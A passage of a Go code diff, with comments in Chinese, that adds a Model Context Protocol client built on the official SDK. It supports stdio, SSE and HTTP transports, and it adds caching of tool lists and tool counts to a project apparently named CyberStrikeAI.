||||
}
|
||||
|
||||
func (c *StdioMCPClient) startProcess() error {
|
||||
cmd := exec.CommandContext(c.ctx, c.command, c.args...)
|
||||
|
||||
stdin, err := cmd.StdinPipe()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
stdout, err := cmd.StdoutPipe()
|
||||
if err != nil {
|
||||
stdin.Close()
|
||||
return err
|
||||
}
|
||||
|
||||
if err := cmd.Start(); err != nil {
|
||||
stdin.Close()
|
||||
stdout.Close()
|
||||
return err
|
||||
}
|
||||
|
||||
c.cmd = cmd
|
||||
c.stdin = stdin
|
||||
c.stdout = stdout
|
||||
c.decoder = json.NewDecoder(stdout)
|
||||
c.encoder = json.NewEncoder(stdin)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *StdioMCPClient) readResponses() {
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
c.logger.Error("读取响应时发生panic", zap.Any("error", r))
|
||||
}
|
||||
}()
|
||||
|
||||
for {
|
||||
var msg Message
|
||||
if err := c.decoder.Decode(&msg); err != nil {
|
||||
if err == io.EOF {
|
||||
c.setStatus("disconnected")
|
||||
break
|
||||
}
|
||||
c.logger.Error("读取响应失败", zap.Error(err))
|
||||
break
|
||||
}
|
||||
|
||||
// 处理响应
|
||||
id := msg.ID.String()
|
||||
c.responsesMu.Lock()
|
||||
if ch, ok := c.responses[id]; ok {
|
||||
select {
|
||||
case ch <- &msg:
|
||||
default:
|
||||
}
|
||||
delete(c.responses, id)
|
||||
}
|
||||
c.responsesMu.Unlock()
|
||||
}
|
||||
}
|
||||
|
||||
func (c *StdioMCPClient) sendRequest(ctx context.Context, msg *Message) (*Message, error) {
|
||||
if c.encoder == nil {
|
||||
return nil, fmt.Errorf("进程未启动")
|
||||
}
|
||||
|
||||
id := msg.ID.String()
|
||||
if id == "" {
|
||||
c.mu.Lock()
|
||||
c.requestID++
|
||||
id = fmt.Sprintf("%d", c.requestID)
|
||||
msg.ID = MessageID{value: id}
|
||||
c.mu.Unlock()
|
||||
}
|
||||
|
||||
// 创建响应通道
|
||||
responseCh := make(chan *Message, 1)
|
||||
c.responsesMu.Lock()
|
||||
c.responses[id] = responseCh
|
||||
c.responsesMu.Unlock()
|
||||
|
||||
// 发送请求
|
||||
if err := c.encoder.Encode(msg); err != nil {
|
||||
c.responsesMu.Lock()
|
||||
delete(c.responses, id)
|
||||
c.responsesMu.Unlock()
|
||||
return nil, fmt.Errorf("发送请求失败: %w", err)
|
||||
}
|
||||
|
||||
// 等待响应
|
||||
select {
|
||||
case resp := <-responseCh:
|
||||
if resp.Error != nil {
|
||||
return nil, fmt.Errorf("MCP错误: %s (code: %d)", resp.Error.Message, resp.Error.Code)
|
||||
}
|
||||
return resp, nil
|
||||
case <-ctx.Done():
|
||||
c.responsesMu.Lock()
|
||||
delete(c.responses, id)
|
||||
c.responsesMu.Unlock()
|
||||
return nil, ctx.Err()
|
||||
case <-time.After(c.timeout):
|
||||
c.responsesMu.Lock()
|
||||
delete(c.responses, id)
|
||||
c.responsesMu.Unlock()
|
||||
return nil, fmt.Errorf("请求超时")
|
||||
}
|
||||
}
|
||||
|
||||
func (c *StdioMCPClient) ListTools(ctx context.Context) ([]Tool, error) {
|
||||
req := Message{
|
||||
ID: MessageID{value: uuid.New().String()},
|
||||
Method: "tools/list",
|
||||
Version: "2.0",
|
||||
}
|
||||
|
||||
req.Params = json.RawMessage("{}")
|
||||
|
||||
resp, err := c.sendRequest(ctx, &req)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("获取工具列表失败: %w", err)
|
||||
}
|
||||
|
||||
var listResp ListToolsResponse
|
||||
if err := json.Unmarshal(resp.Result, &listResp); err != nil {
|
||||
return nil, fmt.Errorf("解析工具列表失败: %w", err)
|
||||
}
|
||||
|
||||
return listResp.Tools, nil
|
||||
}
|
||||
|
||||
func (c *StdioMCPClient) CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error) {
|
||||
req := Message{
|
||||
ID: MessageID{value: uuid.New().String()},
|
||||
Method: "tools/call",
|
||||
Version: "2.0",
|
||||
}
|
||||
|
||||
callReq := CallToolRequest{
|
||||
Name: name,
|
||||
Arguments: args,
|
||||
}
|
||||
|
||||
paramsJSON, _ := json.Marshal(callReq)
|
||||
req.Params = paramsJSON
|
||||
|
||||
resp, err := c.sendRequest(ctx, &req)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("调用工具失败: %w", err)
|
||||
}
|
||||
|
||||
var callResp CallToolResponse
|
||||
if err := json.Unmarshal(resp.Result, &callResp); err != nil {
|
||||
return nil, fmt.Errorf("解析工具调用结果失败: %w", err)
|
||||
}
|
||||
|
||||
return &ToolResult{
|
||||
Content: callResp.Content,
|
||||
IsError: callResp.IsError,
|
||||
}, nil
|
||||
}
|
||||
|
||||
func (c *StdioMCPClient) Close() error {
|
||||
c.cancel()
|
||||
|
||||
if c.stdin != nil {
|
||||
c.stdin.Close()
|
||||
}
|
||||
if c.stdout != nil {
|
||||
c.stdout.Close()
|
||||
}
|
||||
if c.cmd != nil {
|
||||
c.cmd.Process.Kill()
|
||||
c.cmd.Wait()
|
||||
}
|
||||
|
||||
c.setStatus("disconnected")
|
||||
return nil
|
||||
}
|
||||
@@ -0,0 +1,551 @@
|
||||
// Package mcp 外部 MCP 客户端 - 基于官方 go-sdk 实现,保证协议兼容性
|
||||
package mcp
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"net/http"
|
||||
"os"
|
||||
"os/exec"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"github.com/google/uuid"
|
||||
"github.com/modelcontextprotocol/go-sdk/mcp"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
const (
|
||||
clientName = "CyberStrikeAI"
|
||||
clientVersion = "1.0.0"
|
||||
)
|
||||
|
||||
// sdkClient 基于官方 MCP Go SDK 的外部 MCP 客户端,实现 ExternalMCPClient 接口
|
||||
type sdkClient struct {
|
||||
session *mcp.ClientSession
|
||||
client *mcp.Client
|
||||
logger *zap.Logger
|
||||
mu sync.RWMutex
|
||||
status string // "disconnected", "connecting", "connected", "error"
|
||||
}
|
||||
|
||||
// newSDKClientFromSession 用已连接成功的 session 构造(供 createSDKClient 内部使用)
|
||||
func newSDKClientFromSession(session *mcp.ClientSession, client *mcp.Client, logger *zap.Logger) *sdkClient {
|
||||
return &sdkClient{
|
||||
session: session,
|
||||
client: client,
|
||||
logger: logger,
|
||||
status: "connected",
|
||||
}
|
||||
}
|
||||
|
||||
// lazySDKClient 延迟连接:Initialize() 时才调用官方 SDK 建立连接,对外实现 ExternalMCPClient
|
||||
type lazySDKClient struct {
|
||||
serverCfg config.ExternalMCPServerConfig
|
||||
logger *zap.Logger
|
||||
inner ExternalMCPClient // 连接成功后为 *sdkClient
|
||||
mu sync.RWMutex
|
||||
status string
|
||||
}
|
||||
|
||||
func newLazySDKClient(serverCfg config.ExternalMCPServerConfig, logger *zap.Logger) *lazySDKClient {
|
||||
return &lazySDKClient{
|
||||
serverCfg: serverCfg,
|
||||
logger: logger,
|
||||
status: "connecting",
|
||||
}
|
||||
}
|
||||
|
||||
func (c *lazySDKClient) setStatus(s string) {
|
||||
c.mu.Lock()
|
||||
defer c.mu.Unlock()
|
||||
c.status = s
|
||||
}
|
||||
|
||||
func (c *lazySDKClient) GetStatus() string {
|
||||
c.mu.RLock()
|
||||
defer c.mu.RUnlock()
|
||||
if c.inner != nil {
|
||||
return c.inner.GetStatus()
|
||||
}
|
||||
return c.status
|
||||
}
|
||||
|
||||
func (c *lazySDKClient) IsConnected() bool {
|
||||
c.mu.RLock()
|
||||
inner := c.inner
|
||||
c.mu.RUnlock()
|
||||
if inner != nil {
|
||||
return inner.IsConnected()
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func (c *lazySDKClient) Initialize(ctx context.Context) error {
|
||||
c.mu.Lock()
|
||||
if c.inner != nil {
|
||||
c.mu.Unlock()
|
||||
return nil
|
||||
}
|
||||
c.mu.Unlock()
|
||||
|
||||
inner, err := createSDKClient(ctx, c.serverCfg, c.logger)
|
||||
if err != nil {
|
||||
c.setStatus("error")
|
||||
return err
|
||||
}
|
||||
|
||||
c.mu.Lock()
|
||||
c.inner = inner
|
||||
c.mu.Unlock()
|
||||
c.setStatus("connected")
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *lazySDKClient) ListTools(ctx context.Context) ([]Tool, error) {
|
||||
c.mu.RLock()
|
||||
inner := c.inner
|
||||
c.mu.RUnlock()
|
||||
if inner == nil {
|
||||
return nil, fmt.Errorf("未连接")
|
||||
}
|
||||
return inner.ListTools(ctx)
|
||||
}
|
||||
|
||||
func (c *lazySDKClient) CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error) {
|
||||
c.mu.RLock()
|
||||
inner := c.inner
|
||||
c.mu.RUnlock()
|
||||
if inner == nil {
|
||||
return nil, fmt.Errorf("未连接")
|
||||
}
|
||||
return inner.CallTool(ctx, name, args)
|
||||
}
|
||||
|
||||
func (c *lazySDKClient) Close() error {
|
||||
c.mu.Lock()
|
||||
inner := c.inner
|
||||
c.inner = nil
|
||||
c.mu.Unlock()
|
||||
c.setStatus("disconnected")
|
||||
if inner != nil {
|
||||
return inner.Close()
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *sdkClient) setStatus(s string) {
|
||||
c.mu.Lock()
|
||||
defer c.mu.Unlock()
|
||||
c.status = s
|
||||
}
|
||||
|
||||
func (c *sdkClient) GetStatus() string {
|
||||
c.mu.RLock()
|
||||
defer c.mu.RUnlock()
|
||||
return c.status
|
||||
}
|
||||
|
||||
func (c *sdkClient) IsConnected() bool {
|
||||
return c.GetStatus() == "connected"
|
||||
}
|
||||
|
||||
func (c *sdkClient) Initialize(ctx context.Context) error {
|
||||
// sdkClient 由 createSDKClient 在 Connect 成功后才创建,因此 Initialize 时已经连接
|
||||
// 此方法仅用于满足 ExternalMCPClient 接口,实际连接在 createSDKClient 中完成
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *sdkClient) ListTools(ctx context.Context) ([]Tool, error) {
|
||||
if c.session == nil {
|
||||
return nil, fmt.Errorf("未连接")
|
||||
}
|
||||
res, err := c.session.ListTools(ctx, nil)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if res == nil {
|
||||
return nil, nil
|
||||
}
|
||||
return sdkToolsToOur(res.Tools), nil
|
||||
}
|
||||
|
||||
func (c *sdkClient) CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error) {
|
||||
if c.session == nil {
|
||||
return nil, fmt.Errorf("未连接")
|
||||
}
|
||||
params := &mcp.CallToolParams{
|
||||
Name: name,
|
||||
Arguments: args,
|
||||
}
|
||||
res, err := c.session.CallTool(ctx, params)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return sdkCallToolResultToOurs(res), nil
|
||||
}
|
||||
|
||||
func (c *sdkClient) Close() error {
|
||||
c.setStatus("disconnected")
|
||||
if c.session != nil {
|
||||
err := c.session.Close()
|
||||
c.session = nil
|
||||
return err
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// sdkToolsToOur 将 SDK 的 []*mcp.Tool 转为我们的 []Tool
|
||||
func sdkToolsToOur(tools []*mcp.Tool) []Tool {
|
||||
if len(tools) == 0 {
|
||||
return nil
|
||||
}
|
||||
out := make([]Tool, 0, len(tools))
|
||||
for _, t := range tools {
|
||||
if t == nil {
|
||||
continue
|
||||
}
|
||||
schema := make(map[string]interface{})
|
||||
if t.InputSchema != nil {
|
||||
// SDK InputSchema 可能为 *jsonschema.Schema 或 map,统一转为 map
|
||||
if m, ok := t.InputSchema.(map[string]interface{}); ok {
|
||||
schema = m
|
||||
} else {
|
||||
_ = json.Unmarshal(mustJSON(t.InputSchema), &schema)
|
||||
}
|
||||
}
|
||||
desc := t.Description
|
||||
shortDesc := desc
|
||||
if t.Annotations != nil && t.Annotations.Title != "" {
|
||||
shortDesc = t.Annotations.Title
|
||||
}
|
||||
out = append(out, Tool{
|
||||
Name: t.Name,
|
||||
Description: desc,
|
||||
ShortDescription: shortDesc,
|
||||
InputSchema: schema,
|
||||
})
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
// sdkCallToolResultToOurs 将 SDK 的 *mcp.CallToolResult 转为我们的 *ToolResult
|
||||
func sdkCallToolResultToOurs(res *mcp.CallToolResult) *ToolResult {
|
||||
if res == nil {
|
||||
return &ToolResult{Content: []Content{}}
|
||||
}
|
||||
content := sdkContentToOurs(res.Content)
|
||||
return &ToolResult{
|
||||
Content: content,
|
||||
IsError: res.IsError,
|
||||
}
|
||||
}
|
||||
|
||||
func sdkContentToOurs(list []mcp.Content) []Content {
|
||||
if len(list) == 0 {
|
||||
return nil
|
||||
}
|
||||
out := make([]Content, 0, len(list))
|
||||
for _, c := range list {
|
||||
switch v := c.(type) {
|
||||
case *mcp.TextContent:
|
||||
out = append(out, Content{Type: "text", Text: v.Text})
|
||||
default:
|
||||
out = append(out, Content{Type: "text", Text: fmt.Sprintf("%v", c)})
|
||||
}
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
func mustJSON(v interface{}) []byte {
|
||||
b, _ := json.Marshal(v)
|
||||
return b
|
||||
}
|
||||
|
||||
// simpleHTTPClient 简单 JSON-RPC over HTTP:每次请求一次 POST、响应在 body。实现 ExternalMCPClient。
|
||||
// 用于自建 MCP(如 http://127.0.0.1:8081/mcp)或其它仅支持简单 POST 的端点。
|
||||
type simpleHTTPClient struct {
|
||||
url string
|
||||
client *http.Client
|
||||
logger *zap.Logger
|
||||
mu sync.RWMutex
|
||||
status string
|
||||
}
|
||||
|
||||
func newSimpleHTTPClient(ctx context.Context, url string, timeout time.Duration, headers map[string]string, logger *zap.Logger) (ExternalMCPClient, error) {
|
||||
c := &simpleHTTPClient{
|
||||
url: url,
|
||||
client: httpClientWithTimeoutAndHeaders(timeout, headers),
|
||||
logger: logger,
|
||||
status: "connecting",
|
||||
}
|
||||
if err := c.initialize(ctx); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
c.mu.Lock()
|
||||
c.status = "connected"
|
||||
c.mu.Unlock()
|
||||
return c, nil
|
||||
}
|
||||
|
||||
func (c *simpleHTTPClient) setStatus(s string) {
|
||||
c.mu.Lock()
|
||||
defer c.mu.Unlock()
|
||||
c.status = s
|
||||
}
|
||||
|
||||
func (c *simpleHTTPClient) GetStatus() string {
|
||||
c.mu.RLock()
|
||||
defer c.mu.RUnlock()
|
||||
return c.status
|
||||
}
|
||||
|
||||
func (c *simpleHTTPClient) IsConnected() bool {
|
||||
return c.GetStatus() == "connected"
|
||||
}
|
||||
|
||||
func (c *simpleHTTPClient) Initialize(context.Context) error {
|
||||
return nil // 已在 newSimpleHTTPClient 中完成
|
||||
}
|
||||
|
||||
func (c *simpleHTTPClient) initialize(ctx context.Context) error {
|
||||
params := InitializeRequest{
|
||||
ProtocolVersion: ProtocolVersion,
|
||||
Capabilities: make(map[string]interface{}),
|
||||
ClientInfo: ClientInfo{Name: clientName, Version: clientVersion},
|
||||
}
|
||||
paramsJSON, _ := json.Marshal(params)
|
||||
req := &Message{
|
||||
ID: MessageID{value: "1"},
|
||||
Method: "initialize",
|
||||
Version: "2.0",
|
||||
Params: paramsJSON,
|
||||
}
|
||||
resp, err := c.sendRequest(ctx, req)
|
||||
if err != nil {
|
||||
return fmt.Errorf("initialize: %w", err)
|
||||
}
|
||||
if resp.Error != nil {
|
||||
return fmt.Errorf("initialize: %s (code %d)", resp.Error.Message, resp.Error.Code)
|
||||
}
|
||||
// 发送 notifications/initialized(协议要求)
|
||||
notify := &Message{
|
||||
ID: MessageID{value: nil},
|
||||
Method: "notifications/initialized",
|
||||
Version: "2.0",
|
||||
Params: json.RawMessage("{}"),
|
||||
}
|
||||
_ = c.sendNotification(notify)
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *simpleHTTPClient) sendRequest(ctx context.Context, msg *Message) (*Message, error) {
|
||||
body, err := json.Marshal(msg)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
httpReq, err := http.NewRequestWithContext(ctx, http.MethodPost, c.url, bytes.NewReader(body))
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
httpReq.Header.Set("Content-Type", "application/json")
|
||||
resp, err := c.client.Do(httpReq)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
b, _ := io.ReadAll(resp.Body)
|
||||
return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(b))
|
||||
}
|
||||
var out Message
|
||||
if err := json.NewDecoder(resp.Body).Decode(&out); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return &out, nil
|
||||
}
|
||||
|
||||
func (c *simpleHTTPClient) sendNotification(msg *Message) error {
|
||||
body, _ := json.Marshal(msg)
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
httpReq, _ := http.NewRequestWithContext(ctx, http.MethodPost, c.url, bytes.NewReader(body))
|
||||
httpReq.Header.Set("Content-Type", "application/json")
|
||||
resp, err := c.client.Do(httpReq)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
resp.Body.Close()
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *simpleHTTPClient) ListTools(ctx context.Context) ([]Tool, error) {
|
||||
req := &Message{
|
||||
ID: MessageID{value: uuid.New().String()},
|
||||
Method: "tools/list",
|
||||
Version: "2.0",
|
||||
Params: json.RawMessage("{}"),
|
||||
}
|
||||
resp, err := c.sendRequest(ctx, req)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if resp.Error != nil {
|
||||
return nil, fmt.Errorf("tools/list: %s (code %d)", resp.Error.Message, resp.Error.Code)
|
||||
}
|
||||
var listResp ListToolsResponse
|
||||
if err := json.Unmarshal(resp.Result, &listResp); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return listResp.Tools, nil
|
||||
}
|
||||
|
||||
func (c *simpleHTTPClient) CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error) {
|
||||
params := CallToolRequest{Name: name, Arguments: args}
|
||||
paramsJSON, _ := json.Marshal(params)
|
||||
req := &Message{
|
||||
ID: MessageID{value: uuid.New().String()},
|
||||
Method: "tools/call",
|
||||
Version: "2.0",
|
||||
Params: paramsJSON,
|
||||
}
|
||||
resp, err := c.sendRequest(ctx, req)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if resp.Error != nil {
|
||||
return nil, fmt.Errorf("tools/call: %s (code %d)", resp.Error.Message, resp.Error.Code)
|
||||
}
|
||||
var callResp CallToolResponse
|
||||
if err := json.Unmarshal(resp.Result, &callResp); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return &ToolResult{Content: callResp.Content, IsError: callResp.IsError}, nil
|
||||
}
|
||||
|
||||
func (c *simpleHTTPClient) Close() error {
|
||||
c.setStatus("disconnected")
|
||||
return nil
|
||||
}
|
||||
|
||||
// createSDKClient 根据配置创建并连接外部 MCP 客户端(使用官方 SDK),返回实现 ExternalMCPClient 的 *sdkClient
|
||||
// 若连接失败返回 (nil, error)。ctx 用于连接超时与取消。
|
||||
func createSDKClient(ctx context.Context, serverCfg config.ExternalMCPServerConfig, logger *zap.Logger) (ExternalMCPClient, error) {
|
||||
timeout := time.Duration(serverCfg.Timeout) * time.Second
|
||||
if timeout <= 0 {
|
||||
timeout = 30 * time.Second
|
||||
}
|
||||
|
||||
transport := serverCfg.Transport
|
||||
if transport == "" {
|
||||
if serverCfg.Command != "" {
|
||||
transport = "stdio"
|
||||
} else if serverCfg.URL != "" {
|
||||
transport = "http"
|
||||
} else {
|
||||
return nil, fmt.Errorf("配置缺少 command 或 url")
|
||||
}
|
||||
}
|
||||
|
||||
client := mcp.NewClient(&mcp.Implementation{
|
||||
Name: clientName,
|
||||
Version: clientVersion,
|
||||
}, nil)
|
||||
|
||||
var t mcp.Transport
|
||||
switch transport {
|
||||
case "stdio":
|
||||
if serverCfg.Command == "" {
|
||||
return nil, fmt.Errorf("stdio 模式需要配置 command")
|
||||
}
|
||||
// 必须用 exec.Command 而非 CommandContext:doConnect 返回后 ctx 会被 cancel,
|
||||
// 若用 CommandContext(ctx) 会立刻杀掉子进程,导致 ListTools 等后续请求失败、显示 0 工具
|
||||
cmd := exec.Command(serverCfg.Command, serverCfg.Args...)
|
||||
if len(serverCfg.Env) > 0 {
|
||||
cmd.Env = append(cmd.Env, envMapToSlice(serverCfg.Env)...)
|
||||
}
|
||||
t = &mcp.CommandTransport{Command: cmd}
|
||||
case "sse":
|
||||
if serverCfg.URL == "" {
|
||||
return nil, fmt.Errorf("sse 模式需要配置 url")
|
||||
}
|
||||
httpClient := httpClientWithTimeoutAndHeaders(timeout, serverCfg.Headers)
|
||||
t = &mcp.SSEClientTransport{
|
||||
Endpoint: serverCfg.URL,
|
||||
HTTPClient: httpClient,
|
||||
}
|
||||
case "http":
|
||||
if serverCfg.URL == "" {
|
||||
return nil, fmt.Errorf("http 模式需要配置 url")
|
||||
}
|
||||
httpClient := httpClientWithTimeoutAndHeaders(timeout, serverCfg.Headers)
|
||||
t = &mcp.StreamableClientTransport{
|
||||
Endpoint: serverCfg.URL,
|
||||
HTTPClient: httpClient,
|
||||
}
|
||||
case "simple_http":
|
||||
// 简单 JSON-RPC HTTP:每次请求一次 POST、响应在 body。用于自建 MCP 或兼容旧端点(如 http://127.0.0.1:8081/mcp)
|
||||
if serverCfg.URL == "" {
|
||||
return nil, fmt.Errorf("simple_http 模式需要配置 url")
|
||||
}
|
||||
return newSimpleHTTPClient(ctx, serverCfg.URL, timeout, serverCfg.Headers, logger)
|
||||
default:
|
||||
return nil, fmt.Errorf("不支持的传输模式: %s", transport)
|
||||
}
|
||||
|
||||
session, err := client.Connect(ctx, t, nil)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("连接失败: %w", err)
|
||||
}
|
||||
|
||||
return newSDKClientFromSession(session, client, logger), nil
|
||||
}
|
||||
|
||||
func envMapToSlice(env map[string]string) []string {
|
||||
m := make(map[string]string)
|
||||
for _, s := range os.Environ() {
|
||||
if i := strings.IndexByte(s, '='); i > 0 {
|
||||
m[s[:i]] = s[i+1:]
|
||||
}
|
||||
}
|
||||
for k, v := range env {
|
||||
m[k] = v
|
||||
}
|
||||
out := make([]string, 0, len(m))
|
||||
for k, v := range m {
|
||||
out = append(out, k+"="+v)
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
func httpClientWithTimeoutAndHeaders(timeout time.Duration, headers map[string]string) *http.Client {
|
||||
transport := http.DefaultTransport
|
||||
if len(headers) > 0 {
|
||||
transport = &headerRoundTripper{
|
||||
headers: headers,
|
||||
base: http.DefaultTransport,
|
||||
}
|
||||
}
|
||||
return &http.Client{
|
||||
Timeout: timeout,
|
||||
Transport: transport,
|
||||
}
|
||||
}
|
||||
|
||||
type headerRoundTripper struct {
|
||||
headers map[string]string
|
||||
base http.RoundTripper
|
||||
}
|
||||
|
||||
func (h *headerRoundTripper) RoundTrip(req *http.Request) (*http.Response, error) {
|
||||
for k, v := range h.headers {
|
||||
req.Header.Set(k, v)
|
||||
}
|
||||
return h.base.RoundTrip(req)
|
||||
}
|
||||
@@ -16,14 +16,20 @@ import (
|
||||
|
||||
// ExternalMCPManager 外部MCP管理器
|
||||
type ExternalMCPManager struct {
|
||||
clients map[string]ExternalMCPClient
|
||||
configs map[string]config.ExternalMCPServerConfig
|
||||
logger *zap.Logger
|
||||
storage MonitorStorage // 可选的持久化存储
|
||||
executions map[string]*ToolExecution // 执行记录
|
||||
stats map[string]*ToolStats // 工具统计信息
|
||||
errors map[string]string // 错误信息
|
||||
mu sync.RWMutex
|
||||
clients map[string]ExternalMCPClient
|
||||
configs map[string]config.ExternalMCPServerConfig
|
||||
logger *zap.Logger
|
||||
storage MonitorStorage // 可选的持久化存储
|
||||
executions map[string]*ToolExecution // 执行记录
|
||||
stats map[string]*ToolStats // 工具统计信息
|
||||
errors map[string]string // 错误信息
|
||||
toolCounts map[string]int // 工具数量缓存
|
||||
toolCountsMu sync.RWMutex // 工具数量缓存的锁
|
||||
toolCache map[string][]Tool // 工具列表缓存:MCP名称 -> 工具列表
|
||||
toolCacheMu sync.RWMutex // 工具列表缓存的锁
|
||||
stopRefresh chan struct{} // 停止后台刷新的信号
|
||||
refreshWg sync.WaitGroup // 等待后台刷新goroutine完成
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
// NewExternalMCPManager 创建外部MCP管理器
|
||||
@@ -33,15 +39,21 @@ func NewExternalMCPManager(logger *zap.Logger) *ExternalMCPManager {
|
||||
|
||||
// NewExternalMCPManagerWithStorage 创建外部MCP管理器(带持久化存储)
|
||||
func NewExternalMCPManagerWithStorage(logger *zap.Logger, storage MonitorStorage) *ExternalMCPManager {
|
||||
return &ExternalMCPManager{
|
||||
clients: make(map[string]ExternalMCPClient),
|
||||
configs: make(map[string]config.ExternalMCPServerConfig),
|
||||
logger: logger,
|
||||
storage: storage,
|
||||
executions: make(map[string]*ToolExecution),
|
||||
stats: make(map[string]*ToolStats),
|
||||
errors: make(map[string]string),
|
||||
manager := &ExternalMCPManager{
|
||||
clients: make(map[string]ExternalMCPClient),
|
||||
configs: make(map[string]config.ExternalMCPServerConfig),
|
||||
logger: logger,
|
||||
storage: storage,
|
||||
executions: make(map[string]*ToolExecution),
|
||||
stats: make(map[string]*ToolStats),
|
||||
errors: make(map[string]string),
|
||||
toolCounts: make(map[string]int),
|
||||
toolCache: make(map[string][]Tool),
|
||||
stopRefresh: make(chan struct{}),
|
||||
}
|
||||
// 启动后台刷新工具数量的goroutine
|
||||
manager.startToolCountRefresh()
|
||||
return manager
|
||||
}
|
||||
|
||||
// LoadConfigs 加载配置
|
||||
@@ -104,6 +116,17 @@ func (m *ExternalMCPManager) RemoveConfig(name string) error {
|
||||
}
|
||||
|
||||
delete(m.configs, name)
|
||||
|
||||
// 清理工具数量缓存
|
||||
m.toolCountsMu.Lock()
|
||||
delete(m.toolCounts, name)
|
||||
m.toolCountsMu.Unlock()
|
||||
|
||||
// 清理工具列表缓存
|
||||
m.toolCacheMu.Lock()
|
||||
delete(m.toolCache, name)
|
||||
m.toolCacheMu.Unlock()
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
@@ -174,11 +197,22 @@ func (m *ExternalMCPManager) StartClient(name string) error {
|
||||
m.mu.Lock()
|
||||
m.errors[name] = err.Error()
|
||||
m.mu.Unlock()
|
||||
// 触发工具数量刷新(连接失败,工具数量应为0)
|
||||
m.triggerToolCountRefresh()
|
||||
} else {
|
||||
// 连接成功,清除错误信息
|
||||
m.mu.Lock()
|
||||
delete(m.errors, name)
|
||||
m.mu.Unlock()
|
||||
// 立即刷新工具数量和工具列表缓存
|
||||
m.triggerToolCountRefresh()
|
||||
m.refreshToolCache(name, client)
|
||||
// 2 秒后再刷新一次,覆盖 SSE/Streamable 等需稍等就绪的远端
|
||||
go func() {
|
||||
time.Sleep(2 * time.Second)
|
||||
m.triggerToolCountRefresh()
|
||||
m.refreshToolCache(name, client)
|
||||
}()
|
||||
}
|
||||
}()
|
||||
|
||||
@@ -204,6 +238,11 @@ func (m *ExternalMCPManager) StopClient(name string) error {
|
||||
// 清除错误信息
|
||||
delete(m.errors, name)
|
||||
|
||||
// 更新工具数量缓存(停止后工具数量为0)
|
||||
m.toolCountsMu.Lock()
|
||||
m.toolCounts[name] = 0
|
||||
m.toolCountsMu.Unlock()
|
||||
|
||||
// 更新配置为禁用
|
||||
serverCfg.ExternalMCPEnable = false
|
||||
m.configs[name] = serverCfg
|
||||
@@ -229,6 +268,11 @@ func (m *ExternalMCPManager) GetError(name string) string {
|
||||
}
|
||||
|
||||
// GetAllTools 获取所有外部MCP的工具
|
||||
// 优先从已连接的客户端获取,如果连接断开则返回缓存的工具列表
|
||||
// 策略:
|
||||
// - error 状态:不使用缓存,直接跳过(配置错误或服务不可用)
|
||||
// - disconnected/connecting 状态:使用缓存(临时断开)
|
||||
// - connected 状态:正常获取,失败时降级使用缓存
|
||||
func (m *ExternalMCPManager) GetAllTools(ctx context.Context) ([]Tool, error) {
|
||||
m.mu.RLock()
|
||||
clients := make(map[string]ExternalMCPClient)
|
||||
@@ -238,17 +282,21 @@ func (m *ExternalMCPManager) GetAllTools(ctx context.Context) ([]Tool, error) {
|
||||
m.mu.RUnlock()
|
||||
|
||||
var allTools []Tool
|
||||
for name, client := range clients {
|
||||
if !client.IsConnected() {
|
||||
continue
|
||||
}
|
||||
var hasError bool
|
||||
var lastError error
|
||||
|
||||
tools, err := client.ListTools(ctx)
|
||||
// 使用较短的超时时间进行快速检查(3秒),避免阻塞
|
||||
quickCtx, quickCancel := context.WithTimeout(ctx, 3*time.Second)
|
||||
defer quickCancel()
|
||||
|
||||
for name, client := range clients {
|
||||
tools, err := m.getToolsForClient(name, client, quickCtx)
|
||||
if err != nil {
|
||||
m.logger.Warn("获取外部MCP工具列表失败",
|
||||
zap.String("name", name),
|
||||
zap.Error(err),
|
||||
)
|
||||
// 记录错误,但继续处理其他客户端
|
||||
hasError = true
|
||||
if lastError == nil {
|
||||
lastError = err
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
@@ -259,9 +307,97 @@ func (m *ExternalMCPManager) GetAllTools(ctx context.Context) ([]Tool, error) {
|
||||
}
|
||||
}
|
||||
|
||||
